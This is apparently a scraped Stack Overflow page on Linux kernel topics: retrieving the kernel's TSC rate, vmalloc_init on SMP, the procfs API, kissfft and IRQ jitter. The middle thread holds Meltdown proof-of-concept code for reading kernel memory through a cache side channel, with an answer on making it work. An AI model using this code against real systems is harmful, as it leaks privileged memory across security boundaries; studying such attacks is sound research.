I have an embedded Linux system running on an Atom, which is a new enough CPU to have an invariant TSC (time stamp counter), whose frequency the kernel measures on startup. I use the TSC in my own code to keep time (avoiding kernel calls), and my startup code measures the TSC rate, but I'd rather just use the kernel's measurement. Is there any way to retrieve this from the kernel? It's not in /proc/cpuinfo anywhere.
BPFtrace
As root, you can retrieve the kernel's TSC rate with bpftrace:
# bpftrace -e 'BEGIN { printf("%u\n", *kaddr("tsc_khz")); exit(); }' | tail -n
(tested it on CentOS 7 and Fedora 29)
That is the value that is defined, exported and maintained/calibrated in arch/x86/kernel/tsc.c.
GDB
Alternatively, also as root, you can also read it from /proc/kcore, e.g.:
# gdb /dev/null /proc/kcore -ex 'x/uw 0x'$(grep '\<tsc_khz\>' /proc/kallsyms \
| cut -d' ' -f1) -batch 2>/dev/null | tail -n 1 | cut -f2
(tested it on CentOS 7 and Fedora 29)
SystemTap
If the system doesn't have bpftrace nor gdb available but SystemTap you can get it like this (as root):
# cat tsc_khz.stp
#!/usr/bin/stap -g
function get_tsc_khz() %{ /* pure */
THIS->__retvalue = tsc_khz;
%}
probe oneshot {
printf("%u\n", get_tsc_khz());
}
# ./tsc_khz.stp
Of course, you can also write a small kernel module that provides access to tsc_khz via the /sys pseudo file system. Even better, somebody already did that and a tsc_freq_khz module is available on GitHub. With that the following should work:
# modprobe tsc_freq_khz
$ cat /sys/devices/system/cpu/cpu0/tsc_freq_khz
(tested on Fedora 29, reading the sysfs file doesn't require root)
Kernel Messages
In case nothing of the above is an option you can parse the TSC rate from the kernel logs. But this gets ugly fast because you see different kinds of messages on different hardware and kernels, e.g. on a Fedora 29 i7 system:
$ journalctl --boot | grep 'kernel: tsc:' -i | cut -d' ' -f5-
kernel: tsc: Detected 2800.000 MHz processor
kernel: tsc: Detected 2808.000 MHz TSC
But on a Fedora 29 Intel Atom just:
kernel: tsc: Detected 2200.000 MHz processor
While on a CentOS 7 i5 system:
kernel: tsc: Fast TSC calibration using PIT
kernel: tsc: Detected 1895.542 MHz processor
kernel: tsc: Refined TSC clocksource calibration: 1895.614 MHz
Perf Values
The Linux Kernel doesn't provide an API to read the TSC rate, yet. But it does provide one for getting the mult and shift values that can be used to convert TSC counts to nanoseconds. Those values are derived from tsc_khz - also in arch/x86/kernel/tsc.c - where tsc_khz is initialized and calibrated. And they are shared with userspace.
Example program that uses the perf API and accesses the shared page:
#include <asm/unistd.h>
#include <inttypes.h>
#include <linux/perf_event.h>
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>
static long perf_event_open(struct perf_event_attr *hw_event, pid_t pid,
int cpu, int group_fd, unsigned long flags)
{
return syscall(__NR_perf_event_open, hw_event, pid, cpu, group_fd, flags);
}
The actual code:
int main(int argc, char **argv)
{
struct perf_event_attr pe = {
.type = PERF_TYPE_HARDWARE,
.size = sizeof(struct perf_event_attr),
.config = PERF_COUNT_HW_INSTRUCTIONS,
.disabled = 1,
.exclude_kernel = 1,
.exclude_hv = 1
};
int fd = perf_event_open(&pe, 0, -1, -1, 0);
if (fd == -1) {
perror("perf_event_open failed");
return 1;
}
void *addr = mmap(NULL, 4*1024, PROT_READ, MAP_SHARED, fd, 0);
if (!addr) {
perror("mmap failed");
return 1;
}
struct perf_event_mmap_page *pc = addr;
if (pc->cap_user_time != 1) {
fprintf(stderr, "Perf system doesn't support user time\n");
return 1;
}
printf("%16s %5s\n", "mult", "shift");
printf("%16" PRIu32 " %5" PRIu16 "\n", pc->time_mult, pc->time_shift);
close(fd);
}
Tested in on Fedora 29 and it works also for non-root users.
Those values can be used to convert a TSC count to nanoseconds with a function like this one:
static uint64_t mul_u64_u32_shr(uint64_t cyc, uint32_t mult, uint32_t shift)
{
__uint128_t x = cyc;
x *= mult;
x >>= shift;
return x;
}
CPUID/MSR
Another way to obtain the TSC rate is to follow DPDK's lead.
DPDK on x86_64 basically uses the following strategy:
Read the 'Time Stamp Counter and Nominal Core Crystal Clock Information Leaf' via cpuid intrinsics (doesn't require special privileges), if available
Read it from the MSR (requires the rawio capability and read permissions on /dev/cpu/*/msr), if possible
Calibrate it in userspace by other means, otherwise
FWIW, a quick test shows that the cpuid leaf doesn't seem to be that widely available, e.g. an i7 Skylake and a goldmont atom don't have it. Otherwise, as can be seen from the DPDK code, using the MSR requires a bunch of intricate case distinctions.
However, in case the program already uses DPDK, getting the TSC rate, getting TSC values or converting TSC values is just a matter of using the right DPDK API.
I had a brief look and there doesn't seem to be a built-in way to directly get this information from the kernel.
However, the symbol tsc_khz (which I'm guessing is what you want) is exported by the kernel. You could write a small kernel module that exposes a sysfs interface and use that to read out the value of tsc_khz from userspace.
If writing a kernel module is not an option, it may be possible to use some Dark Magic™ to read out the value directly from the kernel memory space. Parse the kernel binary or System.map file to find the location of the tsc_khz symbol and read it from /dev/{k}mem. This is, of course, only possible provided that the kernel is configured with the appropriate options.
Lastly, from reading the kernel source comments, it looks like there's a possibility that the TSC may be unstable on some platforms. I don't know much about the inner workings of the x86 arch but this may be something you want to take into consideration.
The TSC rate is directly related to "cpu MHz" in /proc/cpuinfo. Actually, the better number to use is "bogomips". The reason is that while the freq for TSC is the max CPU freq, the current "cpu Mhz" can vary at time of your invocation.
The bogomips value is computed at boot. You'll need to adjust this value by number of cores and processor count (i.e. the number of hyperthreads) That gives you [fractional] MHz. That is what I use to do what you want to do.
To get the processor count, look for the last "processor: " line. The processor count is <value> + 1. Call it "cpu_count".
To get number of cores, any "cpu cores: " works. number of cores is <value>. Call it "core_count".
So, the formula is:
smt_count = cpu_count;
if (core_count)
smt_count /= core_count;
cpu_freq_in_khz = (bogomips * scale_factor) / smt_count;
That is extracted from my actual code, which is below.
Here's the actual code I use. You won't be able to use it directly because it relies on boilerplate I have, but it should give you some ideas, particularly with how to compute
// syslgx/tvtsc -- system time routines (RDTSC)
#include <tgb.h>
#include <zprt.h>
tgb_t systvinit_tgb[] = {
{ .tgb_val = 1, .tgb_tag = "cpu_mhz" },
{ .tgb_val = 2, .tgb_tag = "bogomips" },
{ .tgb_val = 3, .tgb_tag = "processor" },
{ .tgb_val = 4, .tgb_tag = "cpu_cores" },
{ .tgb_val = 5, .tgb_tag = "clflush_size" },
{ .tgb_val = 6, .tgb_tag = "cache_alignment" },
TGBEOT
};
// _systvinit -- get CPU speed
static void
_systvinit(void)
{
const char *file;
const char *dlm;
XFIL *xfsrc;
int matchflg;
char *cp;
char *cur;
char *rhs;
char lhs[1000];
tgb_pc tgb;
syskhz_t khzcpu;
syskhz_t khzbogo;
syskhz_t khzcur;
sysmpi_p mpi;
file = "/proc/cpuinfo";
xfsrc = fopen(file,"r");
if (xfsrc == NULL)
sysfault("systvinit: unable to open '%s' -- %s\n",file,xstrerror());
dlm = " \t";
khzcpu = 0;
khzbogo = 0;
mpi = &SYS->sys_cpucnt;
SYSZAPME(mpi);
// (1) look for "cpu MHz : 3192.515" (preferred)
// (2) look for "bogomips : 3192.51" (alternate)
// FIXME/CAE -- on machines with speed-step, bogomips may be preferred (or
// disable it)
while (1) {
cp = fgets(lhs,sizeof(lhs),xfsrc);
if (cp == NULL)
break;
// strip newline
cp = strchr(lhs,'\n');
if (cp != NULL)
*cp = 0;
// look for symbol value divider
cp = strchr(lhs,':');
if (cp == NULL)
continue;
// split symbol and value
*cp = 0;
rhs = cp + 1;
// strip trailing whitespace from symbol
for (cp -= 1; cp >= lhs; --cp) {
if (! XCTWHITE(*cp))
break;
*cp = 0;
}
// convert "foo bar" into "foo_bar"
for (cp = lhs; *cp != 0; ++cp) {
if (XCTWHITE(*cp))
*cp = '_';
}
// match on interesting data
matchflg = 0;
for (tgb = systvinit_tgb; TGBMORE(tgb); ++tgb) {
if (strcasecmp(lhs,tgb->tgb_tag) == 0) {
matchflg = tgb->tgb_val;
break;
}
}
if (! matchflg)
continue;
// look for the value
cp = strtok_r(rhs,dlm,&cur);
if (cp == NULL)
continue;
zprt(ZPXHOWSETUP,"_systvinit: GRAB/%d lhs='%s' cp='%s'\n",
matchflg,lhs,cp);
// process the value
// NOTE: because of Intel's speed step, take the highest cpu speed
switch (matchflg) {
case 1: // genuine CPU speed
khzcur = _systvinitkhz(cp);
if (khzcur > khzcpu)
khzcpu = khzcur;
break;
case 2: // the consolation prize
khzcur = _systvinitkhz(cp);
// we've seen some "wild" values
if (khzcur > 10000000)
break;
if (khzcur > khzbogo)
khzbogo = khzcur;
break;
case 3: // remember # of cpu's so we can adjust bogomips
mpi->mpi_cpucnt = atoi(cp);
mpi->mpi_cpucnt += 1;
break;
case 4: // remember # of cpu cores so we can adjust bogomips
mpi->mpi_corecnt = atoi(cp);
break;
case 5: // cache flush size
mpi->mpi_cshflush = atoi(cp);
break;
case 6: // cache alignment
mpi->mpi_cshalign = atoi(cp);
break;
}
}
fclose(xfsrc);
// we want to know the number of hyperthreads
mpi->mpi_smtcnt = mpi->mpi_cpucnt;
if (mpi->mpi_corecnt)
mpi->mpi_smtcnt /= mpi->mpi_corecnt;
zprt(ZPXHOWSETUP,"_systvinit: FINAL khzcpu=%d khzbogo=%d mpi_cpucnt=%d mpi_corecnt=%d mpi_smtcnt=%d mpi_cshalign=%d mpi_cshflush=%d\n",
khzcpu,khzbogo,mpi->mpi_cpucnt,mpi->mpi_corecnt,mpi->mpi_smtcnt,
mpi->mpi_cshalign,mpi->mpi_cshflush);
if ((mpi->mpi_cshalign == 0) || (mpi->mpi_cshflush == 0))
sysfault("_systvinit: cache parameter fault\n");
do {
// use the best reference
// FIXME/CAE -- with speed step, bogomips is better
#if 0
if (khzcpu != 0)
break;
#endif
khzcpu = khzbogo;
if (mpi->mpi_smtcnt)
khzcpu /= mpi->mpi_smtcnt;
if (khzcpu != 0)
break;
sysfault("_systvinit: unable to obtain cpu speed\n");
} while (0);
systvkhz(khzcpu);
zprt(ZPXHOWSETUP,"_systvinit: EXIT\n");
}
// _systvinitkhz -- decode value
// RETURNS: CPU freq in khz
static syskhz_t
_systvinitkhz(char *str)
{
char *src;
char *dst;
int rhscnt;
char bf[100];
syskhz_t khz;
zprt(ZPXHOWSETUP,"_systvinitkhz: ENTER str='%s'\n",str);
dst = bf;
src = str;
// get lhs of lhs.rhs
for (; *src != 0; ++src, ++dst) {
if (*src == '.')
break;
*dst = *src;
}
// skip over the dot
++src;
// get rhs of lhs.rhs and determine how many rhs digits we have
rhscnt = 0;
for (; *src != 0; ++src, ++dst, ++rhscnt)
*dst = *src;
*dst = 0;
khz = atol(bf);
zprt(ZPXHOWSETUP,"_systvinitkhz: PRESCALE bf='%s' khz=%d rhscnt=%d\n",
bf,khz,rhscnt);
// scale down (e.g. we got xxxx.yyyy)
for (; rhscnt > 3; --rhscnt)
khz /= 10;
// scale up (e.g. we got xxxx.yy--bogomips does this)
for (; rhscnt < 3; ++rhscnt)
khz *= 10;
zprt(ZPXHOWSETUP,"_systvinitkhz: EXIT khz=%d\n",khz);
return khz;
}
UPDATE:
Sigh. Yes.
I was using "cpu MHz" from /proc/cpuinfo prior to the introduction of processors with "speed step" technology, so I switched to "bogomips" and the algorithm was derived empirically based on that. When I derived it, I only had access to hyperthreaded machines. However, I've found an old one that is not and the SMT thing isn't valid.
However, it appears that bogomips is always 2x the [maximum] CPU speed. See http://www.clifton.nl/bogo-faq.html That hasn't always been my experience on all kernel versions over the years [IIRC, I started with 0.99.x], but it's probably a reliable assumption these days.
With "constant TSC" [which all newer processors have], denoted by constant_tsc in the flags: field in /proc/cpuinfo, the TSC rate is the maximum CPU frequency.
Originally, the only way to get the frequency information was from /proc/cpuinfo. Now, however, in more modern kernels, there is another way that may be easier and more definitive [I had code coverage for this in other software of mine, but had forgotten about it]:
/sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq
The contents of this file is the maximum CPU frequency in kHz. There are analogous files for the other CPU cores. The files should be identical for most sane motherboards (e.g. ones that are composed of the same model chip and don't try to mix [say] i7s and atoms). Otherwise, you'd have to keep track of the info on a per-core basis and that would get messy fast.
The given directory also has other interesting files. For example, if your processor has "speed step" [and some of the other files can tell you that], you can force maximum performance by writing performance to the scaling_governor file. This will disable use of speed step.
If the processor did not have constant_tsc, you'd have to disable speed step [and run the cores at maximum rate] to get accurate measurements
Related
this is not about programming, but I ask it here..
in linux start_kernel() function, in the mm_init() function, I see vmalloc_init() function.
inside the function I see codes like this.
void __init vmalloc_init(void)
{
struct vmap_area *va;
struct vm_struct *tmp;
int i;
/*
* Create the cache for vmap_area objects.
*/
vmap_area_cachep = KMEM_CACHE(vmap_area, SLAB_PANIC);
for_each_possible_cpu(i) {
struct vmap_block_queue *vbq;
struct vfree_deferred *p;
vbq = &per_cpu(vmap_block_queue, i);
spin_lock_init(&vbq->lock);
INIT_LIST_HEAD(&vbq->free);
p = &per_cpu(vfree_deferred, i);
init_llist_head(&p->list);
INIT_WORK(&p->wq, free_work);
}
/* Import existing vmlist entries. */
for (tmp = vmlist; tmp; tmp = tmp->next) {
va = kmem_cache_zalloc(vmap_area_cachep, GFP_NOWAIT);
if (WARN_ON_ONCE(!va))
continue;
va->va_start = (unsigned long)tmp->addr;
va->va_end = va->va_start + tmp->size;
va->vm = tmp;
insert_vmap_area(va, &vmap_area_root, &vmap_area_list);
}
/*
* Now we can initialize a free vmap space.
*/
vmap_init_free_space();
vmap_initialized = true;
}
I'm not sure if this code is run on every cpu(core) or just on the first cpu?
if this code runs on every smp core, how is this code inside for_each_possible_cpu loop run?
The smp setup seems to be done before this function.
start_kernel() calls mm_init() which calls vmalloc_init(). Only the first (boot) CPU is active at that point. Later, start_kernel() calls arch_call_rest_init() which calls rest_init().
rest_init() creates a kernel thread for the init task with entry point kernel_init(). kernel_init() calls kernel_init_freeable(). kernel_init_freeable() eventually calls smp_init() to activate the remaining CPUs.
Every macro in for_each_cpu family is just wrapper for for() loop, where iterator is a CPU index.
E.g., the core macro of this family is defined as
#define for_each_cpu(cpu, mask) \
for ((cpu) = -1; \
(cpu) = cpumask_next((cpu), (mask)), \
(cpu) < nr_cpu_ids;)
Each macro in for_each_cpu family uses its own CPUs mask, which is just a set of bits corresponded to CPU indices. E.g. mask for for_each_possible_cpu macro have bits set for every index of CPU which could ever be enabled in current machine session.
I am attempting to exploit the meltdown security flaw on Ubuntu 16.04, with an unpatched kernel 4.8.0-36 on an Intel Core-i5 4300M CPU.
First, I am storing the secret data at an address in kernel space using a kernel module :
static __init int initialize_proc(void){
char* key_val = "abcd";
printk("Secret data address = %p\n", key_val);
printk("Value at %p = %s\n", key_val, key_val);
}
The printk statement gives me the address of the secret data.
Mar 30 07:00:49 VM kernel: [62055.121882] Secret data address = fa2ef024
Mar 30 07:00:49 VM kernel: [62055.121883] Value at fa2ef024 = abcd
I then attempt to access the data at this location and in the next instruction use it to cache an element of an array.
// Out of order execution
int meltdown(unsigned long kernel_addr){
char data = *(char*) kernel_addr; //Raises exception
array[data*4096+DELTA] += 10; // <----- Execute out of order
}
I am expecting the CPU to go ahead and cache the array element at index (data*4096 +DELTA) when performing out of order execution. After this, a bounds check is performed and SIGSEGV is thrown.
I handle the SIGSEGV and then time the access to the array elements to determine which one has been cached:
void attackChannel_x86(){
register uint64_t time1, time2;
volatile uint8_t *addr;
int min = 10000;
int temp, i, k;
for(i=0;i<256;i++){
time1 = __rdtscp(&temp); //timestamp before memory access
temp = array[i*4096 + DELTA];
time2 = __rdtscp(&temp) - time1; // change in timestamp after the access
if(time2<=min){
min = time2;
k=i;
}
}
printf("array[%d*4096+DELTA]\n", k);
}
Since the value in data is ‘a’, I am expecting the result to be array[97*4096 + DELTA] since ASCII value of ‘a’ is 97.
However, this is not working and I am getting random outputs.
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
array[241*4096+DELTA]
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
array[78*4096+DELTA]
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
array[146*4096+DELTA]
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
array[115*4096+DELTA]
The possible reasons I could think of are:
The instruction caching the array element is not getting executed
out of order.
Out of order execution is occurring but the cache is being flushed.
I have misunderstood the mapping of memory in the kernel module and the address I'm using is incorrect
Since the system is vulnerable to meltdown, I am certain that rules out the 2nd possibility.
Hence, my question is: Why is out of order execution not working here? Are there any options/flags that “encourage” the CPU to execute out of order ?
Solutions I’ve already tried:
Using clock_gettime instead of rdtscp for timing memory access.
void attackChannel(){
int i, k, temp;
uint64_t diff;
volatile uint8_t *addr;
double min = 10000000;
struct timespec start, end;
for(i=0;i<256;i++){
addr = &array[i*4096 + DELTA];
clock_gettime(CLOCK_MONOTONIC, &start);
temp = *addr;
clock_gettime(CLOCK_MONOTONIC, &end);
diff = end.tv_nsec - start.tv_nsec;
if(diff<=min){
min = diff;
k=i;
}
}
if(min<600)
printf("Accessed element : array[%d*4096+DELTA]\n", k);
}
Keeping the arithmetic units “busy” by executing a loop (see meltdown_busy_loop)
void meltdown_busy_loop(unsigned long kernel_addr){
char kernel_data;
asm volatile(
".rept 1000;"
"add $0x01, %%eax;"
".endr;"
:
:
:"eax"
);
kernel_data = *(char*)kernel_addr;
array[kernel_data*4096 + DELTA] +=10;
}
Using procfs to force the data into the cache before performing a time attack (see meltdown)
int meltdown(unsigned long kernel_addr){
// Cache the data to improve success
int fd = open("/proc/my_secret_key", O_RDONLY);
if(fd<0){
perror("open");
return -1;
}
int ret = pread(fd, NULL, 0, 0); //Data is cached
char data = *(char*) kernel_addr; //Raises exception
array[data*4096+DELTA] += 10; // <----- Out of order
}
For anyone interested in setting it up, here is the link to the github repo
For the sake of completeness, I am appending the main function and error handling code below:
void flushChannel(){
int i;
for(i=0;i<256;i++) array[i*4096 + DELTA] = 1;
for(i=0;i<256;i++) _mm_clflush(&array[i*4096 + DELTA]);
}
void catch_segv(){
siglongjmp(jbuf, 1);
}
int main(){
unsigned long kernel_addr = 0xfa2ef024;
signal(SIGSEGV, catch_segv);
if(sigsetjmp(jbuf, 1)==0)
{
// meltdown(kernel_addr);
meltdown_busy_loop(kernel_addr);
}
else{
printf("Memory Access Violation\n");
}
attackChannel_x86();
}
I think the data needs to be in L1d for Meltdown to work, and attempting to read it only through a TLB / page-table entry that doesn't have privileges won't bring it into L1d.
http://blog.stuffedcow.net/2018/05/meltdown-microarchitecture/
When any kind of bad outcome occurs (page fault, load from a non-speculative memory type, page accessed bit = 0), none of the processors initiate an off-core L2 request to fetch the data.
Unless there's something I'm missing, I think data is only vulnerable to Meltdown when something that is allowed to read it has brought it into L1d. (Directly or via HW prefetch.) I don't think repeated Meltdown attacks can bring data from RAM into L1d.
Try adding a system call or something to your module that uses READ_ONCE() on your secret data (or manually write *(volatile int*)&data; or just make it volatile so you can easily touch it) to bring it into cache from a context that does have privileges for that PTE.
Also: add $0x01, %%eax is a poor choice for delaying retirement. It's only 1 clock cycle of delay per uop, so OoO exec only has ~64 cycles from when the first instruction after the ADDs can enter the scheduler (RS) and run, before it chews through the adds and the faulting loads reach retirement.
At least use imul (3c latency), or better use xorps %xmm0,%xmm0 / repeated sqrtpd %xmm0,%xmm0 (single uop, 16 cycle latency on your Haswell.) https://agner.org/optimize/.
I am working on updating our kernel drivers to work with linux kernel 4.4.0 on Ubuntu 16.0.4. The drivers last worked with linux kernel 3.9.2.
In one of the modules, we have a procfs entries created to read/write the on-board fan monitoring values. Fan monitoring is used to read/write the CPU or GPU temperature/modulation,etc. values.
The module is using the following api to create procfs entries:
struct proc_dir_entry *create_proc_entry(const char *name, umode_t
mode,struct proc_dir_entry *parent);
Something like:
struct proc_dir_entry * proc_entry =
create_proc_entry("fmon_gpu_temp",0644,proc_dir);
proc_entry->read_proc = read_proc;
proc_entry->write_proc = write_proc;
Now, the read_proc is implemented something in this way:
static int read_value(char *buf, char **start, off_t offset, int count, int *eof, void *data) {
int len = 0;
int idx = (int)data;
if(idx == TEMP_FANCTL)
len = sprintf (buf, "%d.%02d\n", fmon_readings[idx] / TEMP_SAMPLES,
fmon_readings[idx] % TEMP_SAMPLES * 100 / TEMP_SAMPLES);
else if(idx == TEMP_CPU) {
int i;
len = sprintf (buf, "%d", fmon_readings[idx]);
for( i=0; i < FCTL_MAX_CPUS && fmon_cpu_temps[i]; i++ ) {
len += sprintf (buf+len, " CPU%d=%d",i,fmon_cpu_temps[i]);
}
len += sprintf (buf+len, "\n");
}
else if(idx >= 0 && idx < READINGS_MAX)
len = sprintf (buf, "%d\n", fmon_readings[idx]);
*eof = 1;
return len;
}
This read function definitely assumes that the user has provided enough buffer space to store the temperature value. This is correctly handled in userspace program. Also, for every call to this function the read value is in totality and therefore there is no support/need for subsequent reads for same temperature value.
Plus, if I use "cat" program on this procfs entry from shell, the 'cat' program correctly displays the value. This is supported, I think, by the setting of EOF to true and returning read bytes count.
New linux kernels do not support this API anymore.
My question is:
How can I change this API to new procfs API structure keeping the functionality same as: every read should return the value, program 'cat' should also work fine and not go into infinite loop ?
The primary user interface for read files on Linux is read(2). Its pair in kernel space is .read function in struct file_operations.
Every other mechanism for read file in kernel space (read_proc, seq_file, etc.) is actually an (parametrized) implementation of .read function.
The only way for kernel to return EOF indicator to user space is returning 0 as number of bytes read.
Even read_proc implementation you have for 3.9 kernel actually implements eof flag as returning 0 on next invocation. And cat actually perfoms the second invocation of read for find that file is end.
(Moreover, cat performs more than 2 invocations of read: first with 1 as count, second with count equal to page size minus 1, and the last with remaining count.)
The simplest way for "one-shot" read implementation is using seq_file in single_open() mode.
This is my first question on stackoverflow and my englsich is unfortunately poor. But I want to try it.
A customized routine of twotonetest of kissfft brings on two different systems very different results.
The under ubuntu translated with gcc on x86 program brings the correct values. That with the openWRT SDK translated for the Arduino YUN (Atheros AR9331) program displays incorrect values. It seems as if since the definition of FIXED_POINT is ignored.
Defined is:
#define FIXED_POINT 32
the function:
double GetFreqBuf( tBuf * io_pBuf, int nfft)
{
kiss_fftr_cfg cfg = NULL;
kiss_fft_cpx *kout = NULL;
kiss_fft_scalar *tbuf = NULL;
uint32_t ptr;
int i;
double sigpow=0;
double noisepow=0;
long maxrange = SHRT_MAX;
cfg = kiss_fftr_alloc(nfft , 0, NULL, NULL);
tbuf = KISS_FFT_MALLOC(nfft * sizeof(kiss_fft_scalar));
kout = KISS_FFT_MALLOC(nfft * sizeof(kiss_fft_cpx));
/* generate the array from samples*/
for (i = 0; i < nfft; i++) {
//nur einen Kanal, eine Krücke, würde nun auch mit 2 kanälen gehen, aber so ist schneller
if (io_pBuf->IndexNextValue >= (i*2))
ptr = io_pBuf->IndexNextValue - (i*2);
else
ptr = io_pBuf->bufSize - ((i*2) - io_pBuf->IndexNextValue);
tbuf[i] = io_pBuf->aData[ptr] ;
}
kiss_fftr(cfg, tbuf, kout);
for (i=0;i < (nfft/2+1);++i) {
double tmpr = (double)kout[i].r / (double)maxrange;
double tmpi = (double)kout[i].i / (double)maxrange;
double mag2 = tmpr*tmpr + tmpi*tmpi;
if (i!=0 && i!= nfft/2)
mag2 *= 2; /* all bins except DC and Nyquist have symmetric counterparts implied*/
/* if there is power between the frq's, it is signal, otherwise noise*/
if ( i > nfft/96 && i < nfft/32 )
noisepow += mag2;
else
sigpow += mag2;
}
kiss_fft_cleanup();
//printf("TEST %d Werte, noisepow: %f sigpow: %f noise # %fdB\n",nfft,noisepow,sigpow,10*log10(noisepow/sigpow +1e-30) );
free(cfg);
free(tbuf);
free(kout);
return 10*log10(noisepow/sigpow +1e-30);
}
As input samples of 16-bit sound from the same file be used. Results differ for example from-3dB to-15dB. AWhere could you start troubleshooting?
Possibility #1 (most likely)
You are compiling kissfft.c or kiss_fftr.c differently than the calling code. This happens to a lot of people.
An easy way to force the same FIXED_POINT is to edit the kiss_fft.h directly. Another option: verify with some printf debugging. i.e. place the following in various places:
printf( __FILE__ " sees sizeof(kiss_fft_scalar)=%d\n" , sizeof(kiss_fft_scalar) )
Possibility #2
Perhaps the FIXED_POINT=16 code works but the FIXED_POINT=32 code does not because something is being handled incorrectly either inside kissfft or on the platform. The 32 bit fixed code relies on int64_t being implemented correctly.
Is that Atheros a 16 bit processor? I know kissfft has been used successfully on 16 bit platforms, but I'm not sure if FIXED_POINT=32 real FFTs on a 16 bit fixed point has been used.
viel Glück,
Mark
I have bumped into a bit inconsistent IRQ/ISR performance on Freescales imx.233 running linux kernel (3.8.13) with CONFIG_PREEMPT_RT patches.
I am little bit surprised why this processor (ARM9, 454mhz) is unable to keep up even with 74kHz IRQ requests.. ?
In my kernel config I have set following flags:
CONFIG_TINY_PREEMPT_RCU=y
CONFIG_PREEMPT_RCU=y
CONFIG_PREEMPT=y
CONFIG_PREEMPT_RT_BASE=y
CONFIG_HAVE_PREEMPT_LAZY=y
CONFIG_PREEMPT_LAZY=y
CONFIG_PREEMPT_RT_FULL=y
CONFIG_PREEMPT_COUNT=y
CONFIG_DEBUG_PREEMPT=y
On the system there is basically nothing running (created by buildroot), and I set PWM to generate a pulse of 74kHz, that serves as interrupt.
Then in the ISR, I just trigger another GPIO output pin, and check the output.
What I find is that sometimes I miss an interrupt -
You can see the missed interrupt here:
And also the the triggering of output pin seems to be a bit inconsistent, the output pin is triggered usually within "5% window", that might still be acceptable. But I worry, that when I start implementing data transfer logic, instead of just triggering the pin, I might run into further problems...
My simple driver code looks like this:
#needed includes
uint16_t INPUT_IRQ = 39;
uint16_t OUTPUT_GPIO = 38;
struct test_device *device;
//Prototypes
void irqtest_exit(void);
int irqtest_init(void);
void free_device(void);
//Default functions
module_init(irqtest_init);
module_exit(irqtest_exit);
//triggering flag
uint16_t pulse = 0x1;
irqreturn_t irq_handle_function(int irq, void *device_id)
{
pulse = !pulse;
gpio_set_value(OUTPUT_GPIO, pulse);
return IRQ_HANDLED;
}
struct test_device {
int huuhaa;
};
void free_device() {
if (device)
kfree(device);
}
int irqtest_init(void) {
int result = 0;
device = kmalloc(sizeof *device, GFP_KERNEL);
device->huuhaa = 10;
printk("IRB/irqtest_init: Inserting IRQ module\n");
printk("IRB/irqtest_init: Requesting GPIO (%d)\n", INPUT_IRQ);
result = gpio_request_one(INPUT_IRQ, GPIOF_IN, "PWM input");
if (result != 0) {
free_device();
printk("IRB/irqtest_init: Failed to set GPIO (%d) as input.. exiting\n", INPUT_IRQ);
return -EINVAL;
}
result = gpio_request_one(OUTPUT_GPIO, GPIOF_OUT_INIT_LOW , "IR OUTPUT");
if (result != 0) {
free_device();
printk("IRB/irqtest_init: Failed to set GPIO (%d) as output.. exiting\n", OUTPUT_GPIO);
return -EINVAL;
}
//Set our desired interrupt line as input
result = gpio_direction_input(INPUT_IRQ);
if (result != 0) {
printk("IRB/irqtest_init: Failed to set IRQ as input.. exiting\n");
free_device();
return -EINVAL;
}
//Set flags for our interrupt, guessing here..
irq_flags |= IRQF_NO_THREAD;
irq_flags |= IRQF_NOBALANCING;
irq_flags |= IRQF_TRIGGER_RISING;
irq_flags |= IRQF_NO_SOFTIRQ_CALL;
//register interrupt
result = request_irq(gpio_to_irq(INPUT_IRQ), irq_handle_function, irq_flags, "irq testing", device);
if (result != 0) {
printk("IRB/irqtest_init: Failed to reserve GPIO 38\n");
return -EINVAL;
}
printk("IRB/irqtest_init: insert success\n");
return 0;
}
void irqtest_exit(void) {
if (device)
kfree(device);
gpio_free(INPUT_IRQ);
gpio_free(OUTPUT_GPIO);
printk("IRB/irqtest_exit: Removing irqtest module\n");
}
int irqtest_open(struct inode *inode, struct file *filp) {return 0;}
int irqtest_release(struct inode *inode, struct file *filp) {return 0;}
In the system, I have following interrupts registered, after the driver is loaded:
# cat /proc/interrupts
CPU0
16: 36379 - MXS Timer Tick
17: 0 - mxs-spi
18: 2103 - mxs-dma
60: 0 gpio-mxs irq testing
118: 0 - mxs-spi
119: 0 - mxs-dma
120: 0 - RTC alarm
124: 0 - 8006c000.serial
127: 68050 - uart-pl011
128: 151 - ci13xxx_imx
Err: 0
I wonder if the flags I declare to my IRQ are good ? I noticed that with this configuration, I can no longer reach console, so kernel seems totally consumed with servicing this 74kHz trigger now.. this can't be right ?
I suppose it's not a big deal for me since this is only during data transfer, but still I feel I'm doing something wrong..
Also, I wonder if it would be more efficient to map the registers with ioremap, and trigger the output with direct memory writes ?
Is there some way I could increase the priority of the interrupt even higher ? Or could I somehow lock the kernel for the duration of the data transfer (~400ms), and generate somehow else my timing for the output ?
Edit: Forgot to add /proc/interrupts output to the question...
What you experience here is interrupt jitter. This is to be expected on Linux, because the kernel regularly disables the interrupts for various tasks (entering a spinlock, handling an interrupt, etc.).
This will happen, regardless wether you have PREEMPT_RT or not, so expecting to generate 74kHz signal with regular interrupts is pretty much unrealistic.
Now, ARM has higher priority interrupts called FIQs, that will never be masked or disabled.
Linux doesn't use FIQ, and is not built to deal with the fact that an FIQ could be used, so you won't be able to use the generic kernel framework.
From Linux driver development point of view however, it's not really different as long as you keep this in mind: you have to write a handler, and associate it to an IRQ. You'll also have to poke into the interrupt controller to make it generate a FIQ for the interrupt you want to use (the details on how to change it are platform-dependant. Some platforms have functions to do that (like imx25 and mxc_set_irq_fiq), some others don't. imx23/28 don't, so you'll have to do it by hand).
The only thing that the functions to setup a fiq handler only work with a assembly-written handler, so you'll have to rewrite your handler in assembly (with your current code, it should be trivial though).
You can grab additional details to the blog post Alexandre posted (http://free-electrons.com/blog/fiq-handlers-in-the-arm-linux-kernel/), where you'll find working code, samples, and explanations on how it all works together.
You can have a look at what my colleague Maxime Ripard did using an FIQ on a similar SoC (i.mx28) :
http://free-electrons.com/blog/fiq-handlers-in-the-arm-linux-kernel/
Try this flags:
int irq_flags;
...
irq_flags = IRQF_TRIGGER_RISING | IRQF_EARLY_RESUME
I had a kernel 3.8.11 and can't find IRQF_NO_SOFTIRQ_CALL define. It's only for 3.8.13?
Also I didn't see irq_flags define. Where is it?